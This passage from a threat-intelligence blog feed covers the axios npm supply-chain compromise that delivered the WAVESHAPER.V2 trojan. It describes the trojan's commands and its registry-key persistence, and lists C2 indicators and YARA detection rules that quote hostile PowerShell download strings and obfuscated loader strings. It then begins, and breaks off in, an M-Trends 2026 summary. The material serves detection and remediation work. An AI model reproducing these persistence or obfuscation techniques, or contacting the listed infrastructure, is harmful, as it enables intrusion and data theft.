hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/></colgroup> <thead> <tr> <th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Command</strong></p> </th> <th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </th> </tr> </thead> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">kill</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Terminates the malware's execution process.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">rundir</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Retrieves detailed directory listings, including file paths, sizes, and creation/modification timestamps for paths specified in the </span><code style="vertical-align: baseline;">ReqPaths</code><span style="vertical-align: baseline;"> parameter.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">runscript</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Decodes and executes a provided AppleScript payload.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">peinject</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p>Decodes, drops, ad-hoc signs, and executes an arbitrary binary payload with optional parameters.</p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 1: WAVESHAPER.V2<span style="vertical-align: baseline;"> commands</span></span></div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">On Windows, persistence is achieved by creating a hidden batch file (</span><code style="vertical-align: baseline;">%PROGRAMDATA%\system.bat</code><span style="vertical-align: baseline;">) and adding a new entry named </span><code style="vertical-align: baseline;">MicrosoftUpdate</code><span style="vertical-align: baseline;"> to </span><code style="vertical-align: baseline;">HKCU:\Software\Microsoft\Windows\CurrentVersion\Run</code><span style="vertical-align: baseline;"> to launch it at logon.</span></p> <p><span style="vertical-align: baseline;">WAVESHAPER.V2 acts as a fully functional RAT with the following capabilities:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Reconnaissance:</strong><span style="vertical-align: baseline;"> Extracts system telemetry, including hostname, username, boot time, time zone, OS version, and detailed running process lists.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Command Execution:</strong><span style="vertical-align: baseline;"> Supports multiple execution methods, including in-memory Portable Executable (PE) injection and arbitrary shell commands. The shell execution command expects a script and script parameters from C2; if no script is provided, the parameter is executed as a PowerShell command, but if a script is provided, it is either Base64-encoded or placed into a file depending on its size.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">File System Enumeration:</strong><span style="vertical-align: baseline;"> Returns detailed metadata for requested target directories by continuously recursing through the file system.</span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Attribution</span></h3> <p><span style="vertical-align: baseline;">GTIG attributes this activity to </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering"><span style="text-decoration: underline; vertical-align: baseline;">UNC1069</span></a><span style="vertical-align: baseline;">, a financially motivated North Korea-nexus threat actor active since 2018. Analysis of the C2 infrastructure (</span><code style="vertical-align: baseline;">sfrclak[.]com</code><span style="vertical-align: baseline;"> resolving to </span><code style="vertical-align: baseline;">142.11.206.73</code><span style="vertical-align: baseline;">) revealed connections from a specific AstrillVPN node previously used by UNC1069. Additionally, adjacent infrastructure hosted on the same ASN has been historically linked to UNC1069 operations.</span></p> <p><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">Furthermore, WAVESHAPER.V2 is a direct evolution of </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering"><span style="text-decoration: underline; vertical-align: baseline;">WAVESHAPER</span></a><span style="vertical-align: baseline;">, a macOS and Linux backdoor previously attributed to UNC1069. While the original WAVESHAPER uses a lightweight, raw binary C2 protocol and employs code packing, WAVESHAPER.V2 communicates using JSON, collects additional system information, and supports more backdoor commands. Despite these upgrades, both versions accept their C2 URL dynamically via command-line arguments, share identical C2 polling behaviors and an uncommon User-Agent string, and deploy secondary payloads to identical temporary directories</span> (e.g., </span><code style="vertical-align: baseline;">/Library/Caches/com.apple.act.mond</code><span style="vertical-align: baseline;">).</span></p> <h3><span style="vertical-align: baseline;">Outlook and Implications</span></h3> <p><span style="vertical-align: baseline;">The impact of this attack by North Korea-nexus actors is broad and has ripple effects as other popular packages rely on axios as a dependency. Notably, UNC1069 isn’t the only threat actor that has launched successful open source supply chain attacks in recent weeks. UNC6780 (also known as TeamPCP) recently poisoned GitHub Actions and PyPI packages associated with projects like Trivy, Checkmarx, and LiteLLM to deploy the SANDCLOCK credential stealer and facilitate follow-on extortion operations. </span></p> <p><span style="vertical-align: baseline;">Hundreds of thousands of stolen secrets could potentially be circulating as a result of these recent attacks. This could enable further software supply chain attacks, software as a service (SaaS) environment compromises (leading to downstream customer compromises), ransomware and extortion events, and cryptocurrency theft over the near term. </span></p> <p><span style="vertical-align: baseline;">Supply chain compromise is a particularly dangerous tactic because it abuses the inherent trust that users and enterprise administrators place in hardware, software, and updates supplied by reputable vendors as well as the trust they may not realize they are placing in collaborative code-sharing communities. Defenders should pay close attention to these campaigns, and enterprises should initiate dedicated efforts to assess the existing impact, remediate compromised systems, and harden environments against future attacks.</span></p> <h3><span style="vertical-align: baseline;">Remediation</span><strong style="vertical-align: baseline;"> </strong></h3> <p><span style="vertical-align: baseline;">GTIG urges all developers and organizations using the axios package to take immediate corrective action. Priority should be given to auditing dependency trees for compromised versions, isolating affected hosts, and rotating any potentially exposed secrets or credentials. Following initial containment, organizations must implement long-term hardening through strict version pinning and enhanced supply-chain monitoring.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Version Control:</strong><span style="vertical-align: baseline;"> Do not upgrade to axios version 1.14.1 or 0.30.4. Ensure corporate-managed NPM repositories are configured to serve only known-good versions (e.g., 1.14.0 or earlier; 0.30.3 or earlier).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Dependency Pinning:</strong><span style="vertical-align: baseline;"> Pin axios to a known safe version in your </span><code style="vertical-align: baseline;">package-lock.json</code><span style="vertical-align: baseline;"> to prevent accidental upgrades.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Malicious Package Audit:</strong><span style="vertical-align: baseline;"> Inspect project lockfiles specifically for the 'plain-crypto-js' package (versions 4.2.0 or 4.2.1). Use tools like </span><a href="https://wiz.io" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Wiz</span></a><span style="vertical-align: baseline;"> or </span><a href="https://deps.dev/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Open Source Insights</span></a><span style="vertical-align: baseline;"> for deeper dependency auditing.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Pipeline Security:</strong><span style="vertical-align: baseline;"> Pause CI/CD deployments for any package relying on axios. Validate that builds are not pulling "latest" versions before redeploying with pinned, safe versions. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Incident Response:</strong><span style="vertical-align: baseline;"> If </span><code style="vertical-align: baseline;">plain-crypto-js</code><span style="vertical-align: baseline;"> is detected, assume the host environment is compromised. Revert the environment to a known-good state and rotate all credentials or secrets present on that machine.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Network Defense:</strong><span style="vertical-align: baseline;"> Block all traffic to sfrclak[.]com and the command &amp; control IP: 142.11.206.73. Monitor and alert on any endpoint communication attempts to this domain.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Cache Remediation:</strong><span style="vertical-align: baseline;"> Clear local and shared npm, yarn, and pnpm caches on all workstations and build servers to prevent re-infection during subsequent installs.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Endpoint Protection:</strong><span style="vertical-align: baseline;"> Deploy EDR to protect developer environments. Monitor for suspicious processes spawning from Node.js applications that match known Indicators of Compromise (IOCs).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Credential Management:</strong><span style="vertical-align: baseline;"> Rotate all tokens and API keys used by applications confirmed to have run indicators of compromise (IOCs).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"><span style="vertical-align: baseline;"><strong style="vertical-align: baseline;">Developer Sandboxing &amp; Secret Vaulting</strong><span style="vertical-align: baseline;">: Isolate development environments in containers or sandboxes to restrict host filesystem access, and migrate plaintext secrets to the OS keychain using </span><a href="https://github.com/ByteNess/aws-vault?tab=readme-ov-file" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">aws-vault</span></a><span style="vertical-align: baseline;">. This ensures compromised packages cannot programmatically scrape credentials or execute malicious scripts directly on the host machine.</span></span></li> </ul> <h3><span style="vertical-align: baseline;">Indicators of Compromise (IOCs) </span></h3> <p><span style="vertical-align: baseline;">To assist the wider community in hunting and identifying the activity outlined in this blog post, we have included IOCs in a free </span><a href="https://www.virustotal.com/gui/collection/c5adea0fa8aac14e6aabd8d3d4a1d19e4cd0eb76e679f2e9d3fed2a3170c09bb/summary" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">GTI Collection</span></a><span style="vertical-align: baseline;"> for registered users.</span></p> <h4><span style="vertical-align: baseline;">Network Indicators</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Indicator</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Type </strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Notes </strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">142.11.206.73</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p>WAVESHAPER.V2</p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">sfrclak[.]com</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p>WAVESHAPER.V2</p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">http://sfrclak[.]com:8000</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p>WAVESHAPER.V2</p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">http://sfrclak[.]com:8000/6202033</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p>WAVESHAPER.V2</p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">23.254.167.216</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Suspected UNC1069 Infrastructure</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4>File Indicators</h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Family</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Notes</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">SHA256</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p>WAVESHAPER.V2</p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Linux Python RAT</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p>WAVESHAPER.V2</p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">macOS Native Binary</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p>WAVESHAPER.V2</p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Windows Stage 1</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p>WAVESHAPER.V2</p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A </span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SILKBELL</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A </span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A </span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">system.bat</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">f7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cd</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A </span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">plain-crypto-js-4.2.1.tgz</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">58401c195fe0a6204b42f5f90995ece5fab74ce7c69c67a24c61a057325af668</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4>YARA Rules</h4> <p><span style="vertical-align: baseline;">These rules may be most useful on developer workstations, CI/build systems, and other suspected impacted hosts for retrospective hunting and validation.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_WAVESHAPER.V2_PS_1 { meta: description = "Detects the WAVESHAPER.V2 PowerShell backdoor which communicates with C2 via base64 encoded JSON beacons and supports PE injection and script execution" author = "GTIG" md5 = "04e3073b3cd5c5bfcde6f575ecf6e8c1" date_created = "2026/03/31" date_modified = "2026/03/31" rev = 1 platforms = "Windows" family = "WAVESHAPER.V2" strings: $ss1 = "packages.npm.org/product1" ascii wide nocase $ss2 = "Extension.SubRoutine" ascii wide nocase $ss3 = "rsp_peinject" ascii wide nocase $ss4 = "rsp_runscript" ascii wide nocase $ss5 = "rsp_rundir" ascii wide nocase $ss6 = "Init-Dir-Info" ascii wide nocase $ss7 = "Do-Action-Ijt" ascii wide nocase $ss8 = "Do-Action-Scpt" ascii wide nocase condition: uint16(0) != 0x5A4D and filesize &lt; 100KB and 5 of ($ss*) }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Hunting_Downloader_suspected_UNC1069_PS_1 { meta: description = "Detects PowerShell dropper associated with suspected UNC1069 and Axios npm package supply chain attack. Associated to WAVESHAPER.V2" author = "GTIG" md5 = "089e2872016f75a5223b5e02c184dfec" date_created = "2026/03/31" date_modified = "2026/03/31" rev = 1 platforms = "Windows" strings: $ss1 = "start /min powershell -w h" ascii wide nocase $ss2 = "[scriptblock]::Create([System.Text.Encoding]::UTF8.GetString" ascii wide nocase $ss3 = "Invoke-WebRequest -UseBasicParsing" ascii wide nocase $ss4 = "-Method POST -Body" ascii wide nocase $ss5 = "packages.npm.org/product1" ascii wide nocase condition: uint16(0) != 0x5A4D and filesize &lt; 5KB and all of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Hunting_Downloader_SILKBELL_1 { meta: description = "Detects the obfuscated version of the JS NPM supply chain downloader using Base64 obfuscation and custom XOR. Associated with WAVESHAPER.V2" author = "GTIG" md5 = "7658962ae060a222c0058cd4e979bfa1" date_created = "2026/03/31" date_modified = "2026/03/31" rev = 1 platforms = "Any" strings: $ss1 = "OrDeR_7077" ascii wide fullword $ss2 = "String.fromCharCode(S^a^333)" ascii wide $ss3 = "\"TE9DQUw^\".replaceAll(\"^\",\"=\")" ascii wide $ss4 = "\"UFM_\".replaceAll(\"_\",\"=\")" ascii wide $ss5 = "\"U0NSXw--\".replaceAll(\"-\",\"=\")" ascii wide $ss6 = "\"UFNfQg--\".replaceAll(\"-\",\"=\")" ascii wide $ss7 = "\"d2hlcmUgcG93ZXJzaGVsbA((\".replaceAll(\"(\",\"=\")" ascii wide condition: uint16(0) != 0x5A4D and filesize &lt; 100KB and all of them }</code></pre></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Google Security Operations (SecOps)</span></h3> <p><span style="vertical-align: baseline;">Google Security Operations (SecOps) customers have access to the following broad category rules and more under the Mandiant Intel Emerging Threats rule pack.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Curl Writing Apple System File to Staging Directory</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Node Spawning Nohup Osascript</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Node Spawning Windows Script Host With Delete Command</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Windows Script Host Spawning Shell With Curl</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Windows Terminal In Suspicious Staging Directory</span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Wiz</span></h3> <p><span style="vertical-align: baseline;">Wiz customers should check their Wiz Threat Center for information on this advisory and whether or not they are impacted. For more information refer to Wiz’s blog post, </span><a href="https://www.wiz.io/blog/axios-npm-compromised-in-supply-chain-attack" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Axios NPM Distribution Compromised in Supply Chain Attack</span></a>.</p></div>Tue, 31 Mar 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package/Google Threat Intelligence Group Mandiant https://cloud.google.com/blog/topics/threat-intelligence/m-trends-2026/<div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Every year, the cyber threat landscape forces defenders to adapt to evolving adversary tactics, techniques, and procedures (TTPs). In 2025, Mandiant observed a clear divergence in adversary pacing that closely aligns with the trends we have been </span><a href="http://cloud.google.com/blog/topics/threat-intelligence"><span style="text-decoration: underline; vertical-align: baseline;">documenting for defenders</span></a><span style="vertical-align: baseline;"> over the past year. On one end of the spectrum, cyber criminal groups optimized for immediate impact and deliberate recovery denial. On the other end, sophisticated cyber espionage groups and insider threats optimized for extreme persistence, utilizing unmonitored edge devices and native network functionalities to evade detection.</span></p> <p><span style="vertical-align: baseline;">Today, we release M-Trends 2026. Grounded in over 500,000 hours of frontline incident investigations conducted by Mandiant globally in 2025, this report provides a definitive look at the TTPs actively being used in breaches today.</span></p></div> <div class="block-aside"><dl> <dt>aside_block</dt> <dd>&lt;ListValue: [StructValue([(&#x27;title&#x27;, &#x27;M-Trends 2026 is available!&#x27;), (&#x27;body&#x27;, &lt;wagtail.rich_text.RichText object at 0x7fa48228e400&gt;), (&#x27;btn_text&#x27;, &#x27;Download now&#x27;), (&#x27;href&#x27;, &#x27;https://cloud.google.com/security/resources/m-trends?utm_source=cgc-blog&amp;utm_medium=blog&amp;utm_campaign=FY26-Q1-GLOBAL-STO89-website-dl-dgcsm-mtrends26-162712&amp;utm_content=-&amp;utm_term=-&#x27;), (&#x27;image&#x27;, &lt;GAEImage: m-trends blog callout&gt;)])]&gt;</dd> </dl></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">By the Numbers: M-Trends 2026</span></h3> <p><span style="vertical-align: baseline;">The metrics in this year's report highlight how adversaries are shifting their approaches to bypass modern security controls:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Global Median Dwell Time:</strong><span style="vertical-align: baseline;"> Global median dwell time rose to 14 days from 11 days. This shift likely reflects growing sophistication, particularly in evading defenses. When looking specifically at the high quantity of cyber espionage and North Korean IT worker incidents, the median dwell time for both categories was 122 days.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Initial Infection Vectors:</strong><span style="vertical-align: baseline;"> Exploits remained the most common initial infection vector for the sixth consecutive year, accounting for 32% of intrusions. However, highly interactive voice phishing saw a significant surge to 11%, becoming the second-most commonly observed vector.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Detection by Source:</strong><span style="vertical-align: 